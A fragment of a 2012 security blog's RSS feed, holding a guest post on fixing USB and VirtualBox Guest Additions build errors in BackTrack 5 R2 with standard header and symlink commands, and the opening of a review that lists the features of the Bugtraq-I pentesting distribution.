&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/UN3TdRUBLN4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/UN3TdRUBLN4/pentestsh-penetration-testing-script.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-bIVi-8gZe9g/T3CDmFbqWBI/AAAAAAAABE4/Zk0wUGpBPl8/s72-c/60.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/pentestsh-penetration-testing-script.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-2262760868157116042</guid><pubDate>Fri, 23 Mar 2012 14:36:00 +0000</pubDate><atom:updated>2012-03-23T12:01:48.219-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Backtrack5</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>BackTrack 5 R2 – VirtualBox Guest Additions + USB Issues Fixes</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/SgbY0HXj-SRTwha4-bjzbt10Vrc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SgbY0HXj-SRTwha4-bjzbt10Vrc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/SgbY0HXj-SRTwha4-bjzbt10Vrc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SgbY0HXj-SRTwha4-bjzbt10Vrc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H2 { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/backtrack-5-r2-virtualbox-guest.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-w5pPZalGIKE/T2yKIIGvJkI/AAAAAAAABEo/n5pyPm328D0/s200/bt5r2-blog-1.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;VirtualBox is of course the most suitable virtualization solution to run BackTrack. Unfortunately, with this latest version of BackTrack, the VirtualBox Guest Additions cannot be installed on a fresh new install. Fortunately after some modifications, everything can be fixed to compile these additions for the 3.2.6 Linux Kernel of BackTrack 5 R2.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="font-family: inherit; text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Download and Install&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;ul style="font-family: inherit;"&gt;&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;BackTrack:&amp;nbsp;&lt;a href="http://www.backtrack-linux.org/downloads/" rel="nofollow" target="_blank"&gt;http://www.backtrack-linux.org/downloads/&lt;/a&gt;  &lt;/b&gt;&lt;/span&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;VirtualBox + Oracle VM Extension  Pack:&amp;nbsp;&lt;a href="https://www.virtualbox.org/wiki/Downloads" rel="nofollow" target="_blank"&gt;https://www.virtualbox.org/wiki/Downloads&lt;/a&gt;  &lt;/b&gt;&lt;/span&gt;  &lt;br /&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;If you want support for &lt;b&gt;USB 2.0&lt;/b&gt; devices you must download and install&amp;nbsp;Oracle VM Extension Pack&amp;nbsp;for VirtualBox!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;I will not describe the steps to install BackTrack on VirtualBox. A lot of tutorials can be found on the Internet to &lt;a href="http://www.ehacking.net/2012/02/backtrack-5-r2-release-update-to.html" target="_blank"&gt;upgrade to BackTrack 5 R2&lt;/a&gt; or to &lt;a href="http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install" rel="nofollow" target="_blank"&gt;makea fresh install&lt;/a&gt;. But here are some screenshots about the VirtualBox configuration for my MacBook Air i7 1.8Ghz.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: blue; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-uGII-I6PTG4/T2tGUpkmGCI/AAAAAAAABEY/zNC2WXqh_1k/s1600/Capture-d%E2%80%99%C3%A9cran-2012-03-16-%C3%A0-12.17.09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="286" src="http://2.bp.blogspot.com/-uGII-I6PTG4/T2tGUpkmGCI/AAAAAAAABEY/zNC2WXqh_1k/s400/Capture-d%E2%80%99%C3%A9cran-2012-03-16-%C3%A0-12.17.09.png" width="450" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-6LrIEApHZnk/T2tGZiSLvlI/AAAAAAAABEg/04UUhREPjdQ/s1600/Capture-d%E2%80%99%C3%A9cran-2012-03-16-%C3%A0-12.17.21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="347" src="http://1.bp.blogspot.com/-6LrIEApHZnk/T2tGZiSLvlI/AAAAAAAABEg/04UUhREPjdQ/s400/Capture-d%E2%80%99%C3%A9cran-2012-03-16-%C3%A0-12.17.21.png" width="450" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: blue; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: blue; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: blue; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Issue #1 (solved): USB device descriptor error&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;usb 1-1: Device descriptor read/8, error -110&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;usb 1-1: Device descriptor read/64, error -110&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
Number of Processor for the Guest OS must be set to 1 or eventually 2…&lt;br /&gt;
For example, my MacBook Air has a Core i7 inside, multithreading displays 4 virtual cores. So I have to set a maximum of 2 cores to BackTrack VM Guest to fix this issue. (Even if the recommended number of cores VirtualBox displays is 4).&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;span style="color: blue;"&gt;Issue #2 (solved): VirtualBox Guest Additions&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
When you try to install the VirtualBox Guest Additions, these two kinds of errors can occur and lead to a vboxguest kernel extension impossible to load.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;The headers for the current running kernel were not found. If the following module compilation fails then this could be the reason.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
and&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Building the main Guest Additions module ...fail!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;(Look at /var/log/vboxadd-install.log to find out what went wrong)&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
Both issues result to:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Starting the VirtualBox Guest Additions ...fail!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;(modprobe vboxguest failed)&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;h4 style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;apt-get install linux-headers-$(uname -r) linux-headers xserver-xorg xserver-xorg-core file-roller # file-roller is not needed, but recommended&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;cd /usr/src/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;tar jxf linux-source-3.2.6.tar.bz2&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;cd /usr/src/linux-headers-3.2.6/include/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;rm asm&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;ln -s /usr/src/linux-source-3.2.6/arch/x86/include/asm asm&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;cd /lib/modules/3.2.6/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;ln -s /usr/src/linux-headers-3.2.6 build&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Ready to install VBOXADDITIONS :-)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Verifying archive integrity... All good.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Uncompressing VirtualBox 4.1.10 Guest Additions for Linux..........&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;VirtualBox Guest Additions installer&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Removing installed version 4.1.10 of VirtualBox Guest Additions...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;tar: Record size = 8 blocks&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Removing existing VirtualBox DKMS kernel modules ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Removing existing VirtualBox non-DKMS kernel modules ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Building the VirtualBox Guest Additions kernel modules&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Building the main Guest Additions module ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Building the shared folder support module ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Building the OpenGL support module ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Doing non-kernel setup of the Guest Additions ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;You should restart your guest to make sure the new modules are actually used&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Installing the Window System drivers&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Installing X.Org Server 1.7 modules ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Setting up the Window System to use the Guest Additions ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;You may need to restart the hal service and the Window System (or just restart&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;the guest system) to enable the Guest Additions.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Installing graphics libraries and desktop services components ...done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Press Return to close this window...&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
Good job, reboot and enjoy adaptative screen resolution, smooth mouse moves, folder sharing, copy/paste from Host to Guest and vis versa, etc.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;br /&gt;
&lt;h3 style="color: blue; font-family: inherit; margin-bottom: 0in; text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;About the Author&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;Thireus&lt;/i&gt; Security Engineer/Consultant, Intern at Thales Communications &amp;amp; Security.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;IT Security and Telecommunication Engineering Student at ENSEIRB-MATMECA &amp;amp; Master 2 CSI University of Bordeaux 1 (Bordeaux, France). Founder and co-administrator of &lt;a href="http://dareyourmind.net/" rel="nofollow" target="_blank"&gt;DareYourMind.net&lt;/a&gt;.&amp;nbsp;Author of various security and privacy related articles on &lt;a href="http://blog.thireus.com/" rel="nofollow" target="_blank"&gt;blog.thireus.com&lt;/a&gt;. Active member in the HackinTosh and JailBreak communities.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-2262760868157116042?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Qlv-yxVstRI:iXZijnne3Z4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Qlv-yxVstRI:iXZijnne3Z4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Qlv-yxVstRI:iXZijnne3Z4:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Qlv-yxVstRI:iXZijnne3Z4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Qlv-yxVstRI:iXZijnne3Z4:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/Qlv-yxVstRI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/Qlv-yxVstRI/backtrack-5-r2-virtualbox-guest.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-w5pPZalGIKE/T2yKIIGvJkI/AAAAAAAABEo/n5pyPm328D0/s72-c/bt5r2-blog-1.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/backtrack-5-r2-virtualbox-guest.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-380036751440561721</guid><pubDate>Wed, 14 Mar 2012 14:54:00 +0000</pubDate><atom:updated>2012-03-14T07:55:31.727-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Bugtraq</category><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>Bugtraq-I Distribution for Pentesting &amp; Forensics</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/t4Lt8V52LTskRoM7dFrUfIEKJA0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/t4Lt8V52LTskRoM7dFrUfIEKJA0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/t4Lt8V52LTskRoM7dFrUfIEKJA0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/t4Lt8V52LTskRoM7dFrUfIEKJA0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/bugtraq-i-distribution-for-pentesting.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-FiNPsP4v7PQ/T2Ct3fqBPVI/AAAAAAAABDs/fT9y-5bO3bU/s200/bugtraq_azul.jpg" width="220" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Some of the special features that you can appreciate are:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;ul style="font-family: inherit;"&gt;&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Administrative improvements of  the system for better management of services.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Expanded the range of  recognition for injection wireless drivers.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Patching the kernel 2.6.38 to  recognize 4 gigs of RAM in 32-bit.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Tools perfectly configured,  automated installation scripts and tools like Nessus,&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;OpenVAS, Greenbone, Nod32, Hashcat,  Avira, BitDefender, ClamAV, Avast,&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;AVG, etc...&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Unique Scripts from  Bugtraq-Team (SVN updates tools, delete tracks,&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;backdoors, Spyder-sql, etc.)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Stability and performance  optimized: Enhanced performance flash and java and&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;start purging unnecessary services.  So that the user can use only the services you&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;really want.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;It has incorporated the  creation of the user in the installation, which is created&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;with all system configurations.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
